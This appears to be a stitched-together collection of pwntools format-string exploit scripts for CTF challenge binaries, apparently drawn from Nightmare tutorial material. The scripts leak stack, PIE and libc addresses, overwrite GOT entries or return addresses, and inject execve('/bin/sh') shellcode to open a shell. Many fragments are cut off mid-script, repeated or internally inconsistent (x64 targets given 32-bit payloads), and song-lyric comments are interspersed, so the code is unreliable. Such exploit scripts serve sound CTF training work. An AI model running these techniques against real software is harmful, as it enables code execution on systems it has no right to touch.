import sf
import sys
import signal
target = process("./chall-test_FmtString-13-x86")
gdb.attach(target, execute="verify_exploit")
bof_payload = sf.BufferOverflow(arch=32)
target.recvuntil("Tell me I was never good enough: ")
leak = int(target.recvline().strip(b"\n"), 16)
ret_address = leak + (108)
fs = sf.WriteFmtStr(arch=32,
value=-0x46,
address=0x0,
offset=0x4,
printed_bytes=0x0,
alignment_bytes=0x0,
value_base=ret_address,
address_base=ret_address)
payload = sf.BufferOverflow(arch=32, start=108)
payload.add_bytes(108, fs.generate_fmt_str())
payload.add_bytes(
70,
b"\x83\xec\x7f\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\x04\x05\x04\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80"
)
target.sendline(payload.generate_payload())
# Exploit Verification starts here 15935728
from pwn import *
import os
import sf
import sys
import signal
target = process("./chall-test_FmtString-01-x64")
gdb.attach(target, execute="verify_exploit")
bof_payload = sf.BufferOverflow(arch=64)
fs = sf.WriteFmtStr(arch=64,
value=0x401196,
address=0x403398,
offset=0x6,
printed_bytes=0x0,
alignment_bytes=0x0,
value_base=0,
address_base=0)
payload = fs.generate_fmt_str()
target.sendline(payload)
# Exploit Verification starts here 15935728
def handler(signum, frame):
raise Exception("Timed out")
signal.signal(signal.SIGALRM, handler)
signal.alarm(2)
import signal
target = process("./chall-test_FmtString-17-x86")
gdb.attach(target, execute="verify_exploit")
bof_payload = sf.BufferOverflow(arch=32)
target.recvuntil("Cancelled out and rendered obsolute: ")
leak = int(target.recvline().strip(b"\n"), 16)
pie_base = leak - (4684)
bof_payload.add_base("pie", pie_base)
fs = sf.WriteFmtStr(
arch = 32,
value = 0x124c,
address = 0x3324,
offset = 0x7,
printed_bytes = 0x0,
alignment_bytes = 0x1,
value_base = pie_base,
address_base = pie_base)
payload = fs.generate_fmt_str()
target.sendline(payload)
fs = sf.WriteFmtStr(
arch = 32,
value = 0x10b0,
address = 0x3330,
offset = 0x7,
printed_bytes = 0x0,
alignment_bytes = 0x1,
value_base = pie_base,
address_base = pie_base)
import signal
target = process("./chall-test_FmtString-11-x64",
env={"LD_PRELOAD": "./libc-2.30.so"})
gdb.attach(target)
bof_payload = sf.BufferOverflow(arch=64)
target.recvuntil("It seems I've been buried alive: ")
leak = int(target.recvuntil(b"\n").strip(b"\n"), 16)
libc_base = leak - (413040)
bof_payload.add_base("libc", libc_base)
print("libcBase is: %s" % hex(libc_base))
fs = sf.WriteFmtStr(arch=64,
value=0xe6b93,
address=0x4033b8,
offset=0x6,
printed_bytes=0x0,
alignment_bytes=0x0,
value_base=libc_base,
address_base=0)
payload = fs.generate_fmt_str()
target.sendline(payload)
# Exploit Verification starts here 15935728
def handler(signum, frame):
raise Exception("Timed out")
signal.signal(signal.SIGALRM, handler)
signal.alarm(2)
# For more info checkout: https://github.com/guyinatuxedo/nightmare/tree/master/modules/10-fmt_strings
from pwn import *
import sf
target = process("./chall-test_FmtString-14-x86")
gdb.attach(target)
bof_payload = sf.BufferOverflow(arch=32)
fs = sf.WriteFmtStr(
arch = 32,
value = 0x80492a3,
address = 0x804c010,
offset = 0x6,
printed_bytes = 0x0,
alignment_bytes = 0x1,
value_base = 0,
address_base = 0)
payload = fs.generate_fmt_str()
target.sendline(payload)
fs = sf.WriteFmtStr(
arch = 32,
value = 0x80490e0,
address = 0x804c00c,
offset = 0x6,
printed_bytes = 0x0,
alignment_bytes = 0x1,
value_base = 0,
address_base = 0)
leakPayload = b""
leakPayload += b"xxxxxxx"
leakPayload += b"%3$x"
leakPayload += b"yyyyyyy"
target.sendline(leakPayload)
leak = target.recvuntil(b"yyyyyyy")
leak = leak.strip(b"yyyyyyy")
leak = leak.split(b"xxxxxxx")[1]
leak = int(leak, 0x10)
pie_base = leak - 0x128f
print("PieBase is: %s" % hex(pie_base))
fs = sf.WriteFmtStr(arch=32,
value=0x124d,
address=0x3314,
offset=0x6,
printed_bytes=0x0,
alignment_bytes=0x0,
value_base=pie_base,
address_base=pie_base)
payload = fs.generate_fmt_str()
target.sendline(payload)
target.interactive()
# +------------------------------------------------+
# | Artist: Slipknot |
# +------------------------------------------------+
# | Song: (515) |
# +------------------------------------------------+
# | *sid screaming |
# +------------------------------------------------+
leakPayload = b""
leakPayload += b"xxxxxxx"
leakPayload += b"%13$lx"
leakPayload += b"yyyyyyy"
target.sendline(leakPayload)
leak = target.recvuntil(b"yyyyyyy")
leak = leak.strip(b"yyyyyyy")
leak = leak.split(b"xxxxxxx")[1]
leak = int(leak, 0x10)
libc_base = leak - 0xbf7e5
print("libcBase is: %s" % hex(libc_base))
fs = sf.WriteFmtStr(arch=64,
value=0x554e0,
address=0x403358,
offset=0x8,
printed_bytes=0x0,
alignment_bytes=0x0,
value_base=libc_base,
address_base=0)
payload = fs.generate_fmt_str()
target.sendline(payload)
target.sendline("/bin/sh\x00")
# Exploit Verification starts here 15935728
def handler(signum, frame):
raise Exception("Timed out")
import os
import sf
import sys
import signal
target = process("./chall-test_angstrum16-format1")
gdb.attach(target, execute="verify_exploit")
bof_payload = sf.BufferOverflow(arch=64)
fs = sf.WriteFmtStr(
arch = 64,
value = 0x40074d,
address = 0x601030,
offset = 0x8,
printed_bytes = 0x0,
alignment_bytes = 0x0,
value_base = 0,
address_base = 0)
payload = fs.generate_fmt_str()
target.sendline(payload)
# Exploit Verification starts here 15935728
def handler(signum, frame):
raise Exception("Timed out")
signal.signal(signal.SIGALRM, handler)
signal.alarm(2)
from pwn import *
import sf
target = process("./chall-test_FmtString-13-x64")
gdb.attach(target)
bof_payload = sf.BufferOverflow(arch=64)
target.recvuntil("Tell me I was never good enough: ")
leak = int(target.recvuntil(b"\n").strip(b"\n"), 16)
ret_address = leak + (152)
fs = sf.WriteFmtStr(arch=64,
value=-0x40,
address=0x403390,
offset=0x6,
printed_bytes=0x0,
alignment_bytes=0x0,
value_base=ret_address,
address_base=0)
payload = sf.BufferOverflow(arch=64, start=152)
payload.add_bytes(152, fs.generate_fmt_str())
payload.add_bytes(
64,
b"\x31\xf6\x48\xbf\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdf\xf7\xe6\x04\x3b\x57\x54\x5f\x0f\x05"
)
target.sendline(payload.generate_payload())
target.interactive()
# +------------------------------------------------+
# For more info checkout: https://github.com/guyinatuxedo/nightmare/tree/master/modules/10-fmt_strings
from pwn import *
import sf
target = process("./chall-test_ractf-nra")
gdb.attach(target)
bof_payload = sf.BufferOverflow(arch=32)
fs = sf.WriteFmtStr(
arch = 32,
value = 0x8049245,
address = 0x804c018,
offset = 0x4,
printed_bytes = 0x0,
alignment_bytes = 0x0,
value_base = 0,
address_base = 0)
payload = fs.generate_fmt_str()
target.sendline(payload)
target.interactive()
# +------------------------------------------------+
# | Artist: Slipknot |
# +------------------------------------------------+
# | Song: Spit it Out |
# +------------------------------------------------+
#
# For more info checkout: https://github.com/guyinatuxedo/nightmare/tree/master/modules/10-fmt_strings
from pwn import *
import sf
target = process("./chall-test_FmtString-03-x64")
gdb.attach(target)
bof_payload = sf.BufferOverflow(arch=32)
fs = sf.WriteFmtStr(arch=32,
value=0x8049236,
address=0x804b2f4,
offset=0x8,
printed_bytes=0x5,
alignment_bytes=0x2,
value_base=0,
address_base=0)
payload = fs.generate_fmt_str()
target.sendline(payload)
target.interactive()
# +------------------------------------------------+
# | Artist: Distrubed |
# +------------------------------------------------+
# | Song: The Light |
# +------------------------------------------------+
# | Sometimes darkness, |
# | can show you, |
#
# For more info checkout: https://github.com/guyinatuxedo/nightmare/tree/master/modules/10-fmt_strings
from pwn import *
import sf
target = process("./chall-test_FmtString-02-x64")
gdb.attach(target)
bof_payload = sf.BufferOverflow(arch=32)
fs = sf.WriteFmtStr(arch=32,
value=0x8049216,
address=0x804b2e4,
offset=0xa,
printed_bytes=0x10,
alignment_bytes=0x0,
value_base=0,
address_base=0)
payload = fs.generate_fmt_str()
target.sendline(payload)
target.interactive()
# +------------------------------------------------+
# | Artist: Five Finger Death Punch |
# +------------------------------------------------+
# | Song: Coming Down |
# +------------------------------------------------+
# | I'm |
# | Coming Down |
from pwn import *
import os
import sf
import sys
import signal
target = process("./chall-test_tamu17-pwn3")
gdb.attach(target, execute="verify_exploit")
bof_payload = sf.BufferOverflow(arch=32)
fs = sf.WriteFmtStr(arch=32,
value=0x80485ab,
address=0x804a01c,
offset=0x4,
printed_bytes=0x0,
alignment_bytes=0x0,
value_base=0,
address_base=0)
payload = fs.generate_fmt_str()
target.sendline(payload)
# Exploit Verification starts here 15935728
def handler(signum, frame):
raise Exception("Timed out")
signal.signal(signal.SIGALRM, handler)
signal.alarm(2)
import sf
target = process("./chall-test_FmtString-15-x86")
gdb.attach(target)
bof_payload = sf.BufferOverflow(arch=32)
target.recvuntil("Total Nightmare: ")
leak = int(target.recvline().strip(b"\n"), 16)
pie_base = leak - (4826)
bof_payload.add_base("pie", pie_base)
fs = sf.WriteFmtStr(arch=32,
value=0x12da,
address=0x33a4,
offset=0x6,
printed_bytes=0x0,
alignment_bytes=0x1,
value_base=pie_base,
address_base=pie_base)
payload = fs.generate_fmt_str()
target.sendline(payload)
fs = sf.WriteFmtStr(arch=32,
value=0x10f0,
address=0x33a0,
offset=0x6,
printed_bytes=0x0,
alignment_bytes=0x1,
value_base=pie_base,
address_base=pie_base)
payload = fs.generate_fmt_str()
target.sendline(payload)
from pwn import *
import sf
target = process("./chall-test_FmtString-11-x86")
gdb.attach(target)
bof_payload = sf.BufferOverflow(arch=32)
target.recvuntil("Tell me I was never good enough: ")
leak = int(target.recvline().strip(b"\n"), 16)
ret_address = leak + (532)
fs = sf.WriteFmtStr(arch=32,
value=0x80491f6,
address=0x0,
offset=0x6,
printed_bytes=0x0,
alignment_bytes=0x0,
value_base=None,
address_base=ret_address)
payload = fs.generate_fmt_str()
target.sendline(payload)
target.interactive()
# +------------------------------------------------+
# | Artist: Distrubed |
# +------------------------------------------------+
# | Song: The Sound of Silence |
# +------------------------------------------------+
# | Hello Darkness, |
# | my old friend |
from pwn import *
import sf
target = process("./chall-test_FmtString-20-x86")
gdb.attach(target)
bof_payload = sf.BufferOverflow(arch=32)
target.recvuntil("Tell me I was never good enough: ")
leak = int(target.recvline().strip(b"\n"), 16)
ret_address = leak + (87)
fs = sf.WriteFmtStr(arch=32,
value=-0x31,
address=0x804b2d8,
offset=0x6,
printed_bytes=0x0,
alignment_bytes=0x3,
value_base=ret_address,
address_base=0)
payload = sf.BufferOverflow(arch=32, start=87)
payload.add_bytes(87, fs.generate_fmt_str())
payload.add_bytes(
49,
b"\x83\xec\x7f\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\x04\x05\x04\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80"
)
target.sendline(payload.generate_payload())
target.interactive()
# +------------------------------------------------+
import os
import sf
import sys
import signal
target = process("./chall-test_redpwn19-rot26")
gdb.attach(target, execute="verify_exploit")
bof_payload = sf.BufferOverflow(arch=32)
fs = sf.WriteFmtStr(
arch = 32,
value = 0x8048737,
address = 0x804a020,
offset = 0x7,
printed_bytes = 0x0,
alignment_bytes = 0x0,
value_base = 0,
address_base = 0)
payload = fs.generate_fmt_str()
target.sendline(payload)
# Exploit Verification starts here 15935728
def handler(signum, frame):
raise Exception("Timed out")
signal.signal(signal.SIGALRM, handler)
signal.alarm(2)
# For more info checkout: https://github.com/guyinatuxedo/nightmare/tree/master/modules/10-fmt_strings
from pwn import *
import time
import sf
target = process("./Correction-FsGotShellcodeFsleak-x86")
gdb.attach(target)
bof_payload = sf.BufferOverflow(arch=32)
fs = sf.WriteFmtStr(
arch = 32,
value = 0x804922b,
address = 0x804b2b0,
offset = 0x7,
printed_bytes = 0x0,
alignment_bytes = 0x0,
value_base = 0,
address_base = 0)
payload = fs.generate_fmt_str()
target.sendline(payload)
leakPayload = b""
leakPayload += b"\x83\xec\x7f\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\x04\x05\x04\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80"
leakPayload += b"xxxxxxx"
leakPayload += b"%134$x"
leakPayload += b"yyyyyyy"
target.sendline(leakPayload)
leak = target.recvuntil(b"yyyyyyy")
leak = leak.strip(b"yyyyyyy")
leak = leak.split(b"xxxxxxx")[1]
from pwn import *
import os
import sf
import sys
import signal
target = process("./chall-test_FmtString-16-x86")
gdb.attach(target, execute="verify_exploit")
bof_payload = sf.BufferOverflow(arch=32)
fs = sf.WriteFmtStr(arch=32,
value=0x80491e6,
address=0x804b310,
offset=0x7,
printed_bytes=0x0,
alignment_bytes=0x3,
value_base=0,
address_base=0)
payload = fs.generate_fmt_str()
target.sendline(payload)
# Exploit Verification starts here 15935728
def handler(signum, frame):
raise Exception("Timed out")
signal.signal(signal.SIGALRM, handler)
signal.alarm(2)
import sf
from pwn import *
target = remote("localhost", 30011)
# target = process("./chall_11")
# gdb.attach(target)
target.sendline(b"00")
target.recvline()
fs = sf.WriteFmtStr(
arch = 32,
value = 0x80484e6,
address = 0x8049918,
offset = 0x6,
printed_bytes = 0x0,
alignment_bytes = 0x0,
value_base = 0x0,
address_base = 0x0)
payload = fs.generate_fmt_str()
target.sendline(payload)
target.sendline(payload)
target.interactive()
import sf
target = process("./chall-test_FmtString-04-x64")
gdb.attach(target)
bof_payload = sf.BufferOverflow(arch=64)
target.recvuntil("We're dreaming: ")
leak = int(target.recvuntil(b"\n").strip(b"\n"), 16)
pie_base = leak - (4576)
bof_payload.add_base("pie", pie_base)
fs = sf.WriteFmtStr(arch=64,
value=0x11c9,
address=0x33d0,
offset=0x6,
printed_bytes=0x0,
alignment_bytes=0x0,
value_base=pie_base,
address_base=pie_base)
payload = fs.generate_fmt_str()
target.sendline(payload)
target.interactive()
# +------------------------------------------------+
# | Artist: Green Day |
# +------------------------------------------------+
# | Song: Holiday |
# +------------------------------------------------+
# | Hear the sound of the |
# | falling rain |
#
# For more info checkout: https://github.com/guyinatuxedo/nightmare/tree/master/modules/10-fmt_strings
from pwn import *
import time
import sf
target = process("./Correction-FsGotShellcodeFsleak-x64")
gdb.attach(target)
bof_payload = sf.BufferOverflow(arch=64)
fs = sf.WriteFmtStr(arch=64,
value=0x4011be,
address=0x403388,
offset=0x6,
printed_bytes=0x0,
alignment_bytes=0x0,
value_base=0,
address_base=0)
payload = fs.generate_fmt_str()
target.sendline(payload)
leakPayload = b""
leakPayload += b"xxxxxxx"
leakPayload += b"%70$lx"
leakPayload += b"yyyyyyy"
leakPayload += b"\x31\xf6\x48\xbf\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdf\xf7\xe6\x04\x3b\x57\x54\x5f\x0f\x05"
target.sendline(leakPayload)
leak = target.recvuntil(b"yyyyyyy")
leak = leak.strip(b"yyyyyyy")
leak = leak.split(b"xxxxxxx")[1]
leak = int(leak, 0x10)
leakPayload = b""
leakPayload += b"xxxxxxx"
leakPayload += b"%2$x"
leakPayload += b"yyyyyyy"
target.sendline(leakPayload)
leak = target.recvuntil(b"yyyyyyy")
leak = leak.strip(b"yyyyyyy")
leak = leak.split(b"xxxxxxx")[1]
leak = int(leak, 0x10)
libc_base = leak - 0x1e9580
print("libcBase is: %s" % hex(libc_base))
fs = sf.WriteFmtStr(arch=32,
value=0x458b0,
address=0x804b2a0,
offset=0x6,
printed_bytes=0x0,
alignment_bytes=0x0,
value_base=libc_base,
address_base=0)
payload = fs.generate_fmt_str()
target.sendline(payload)
target.sendline("/bin/sh\x00")
# Exploit Verification starts here 15935728
def handler(signum, frame):
raise Exception("Timed out")
#
# For more info checkout: https://github.com/guyinatuxedo/nightmare/tree/master/modules/10-fmt_strings
from pwn import *
import sf
target = process("./chall-test_backdoor17-bbpwn")
gdb.attach(target)
bof_payload = sf.BufferOverflow(arch=32)
fs = sf.WriteFmtStr(arch=32,
value=0x804870b,
address=0x804a028,
offset=0xa,
printed_bytes=0x46,
alignment_bytes=0x0,
value_base=0,
address_base=0)
payload = fs.generate_fmt_str()
target.sendline(payload)
target.interactive()
# +------------------------------------------------+
# | Artist: Godsmack |
# +------------------------------------------------+
# | Song: I Stand Alone |
# +------------------------------------------------+
# | I've told you this, |
# | once, |
